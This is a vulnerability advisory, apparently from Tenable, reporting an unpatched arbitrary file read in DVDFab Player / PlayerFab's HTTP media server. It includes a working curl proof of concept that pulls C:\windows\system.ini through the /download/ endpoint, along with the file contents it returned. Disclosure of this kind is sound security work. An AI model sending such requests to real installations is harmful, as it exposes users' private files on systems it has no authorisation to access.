Vulnerability in DVDFab Player Permits Attacker to Read Arbitrary Files in Windows Filesystem
HighSynopsis
Arbitrary File Read in DVDFab 12 Player / PlayerFab
AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N (7.5/7.3)
The DVDFab 12 suite contains an application called DVDFab Player (or, as it has very recently been renamed, "PlayerFab"), which serves a browseable media library over HTTP on port 32080. If the client opts to download the debuging log, the HTML user interface will issue a request that specifies the path to the log file. This path can easily be changed by the user either by tampering with the browser's request, or by issuing an HTTP GET request that directly specifies the name of the desired file.
Proof of Concept
In place of C%3a%2fwindows%2fsystem.ini, the attacker may supply any other URL-encoded path to a file on the system for which the user running the DVDFab Player / PlayerFab application has read access.
$ curl "http://10.3.2.104:32080/download/C%3a%2fwindows%2fsystem.ini"
; for 16-bit app support
[386Enh]
woafont=dosapp.fon
EGA80WOA.FON=EGA80WOA.FON
EGA40WOA.FON=EGA40WOA.FON
CGA80WOA.FON=CGA80WOA.FON
CGA40WOA.FON=CGA40WOA.FON[drivers]
wave=mmdrv.dll
timer=timer.drv[mci]
Solution
DVDFab has not responded to our attempts to bring this vulnerability to their attention, and so, to the best of our knowledge, there is no reason to expect that a patch is forthcoming.
All information within TRA advisories is provided “as is”, without warranty of any kind, including the implied warranties of merchantability and fitness for a particular purpose, and with no guarantee of completeness, accuracy, or timeliness. Individuals and organizations are responsible for assessing the impact of any actual or potential security vulnerability.
Tenable takes product security very seriously. If you believe you have found a vulnerability in one of our products, we ask that you please work with us to quickly resolve it in order to protect customers. Tenable believes in responding quickly to such reports, maintaining communication with researchers, and providing a solution in short order.
For more details on submitting vulnerability information, please see our Vulnerability Reporting Guidelines page.
If you have questions or corrections about this advisory, please email [email protected]
Risk Information
Olivia Lucca Fraser
